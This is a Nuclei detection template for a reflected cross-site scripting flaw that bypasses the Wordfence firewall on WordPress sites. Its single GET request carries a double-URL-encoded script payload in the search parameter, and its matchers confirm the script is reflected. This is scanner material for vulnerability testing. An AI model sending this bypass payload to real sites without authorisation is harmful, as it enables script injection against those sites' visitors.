id: wordpress-wordfence-waf-bypass-xss

info:
  name: Wordpress Wordfence - Cross-Site Scripting
  author: hackergautam
  severity: medium
  description: Wordpress Wordfence is vulnerable to cross-site scripting.
  reference:
    - https://twitter.com/naglinagli/status/1382082473744564226
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    max-request: 1
  tags: wordpress,wordfence,xss,bypass

http:
  - method: GET
    path:
      - "{{BaseURL}}/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - <script>alert(document.domain)</script>
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 4a0a0047304502203bf332bad88b42bad13753e7b75eb53d71765c488f687a0e4debdee14d9f9abd022100ba222adbe24edb0c96da975357596ae7e3a3b3254eb2fb598e12817108d5638f:922c64590222798bb761d5b6d8e72950
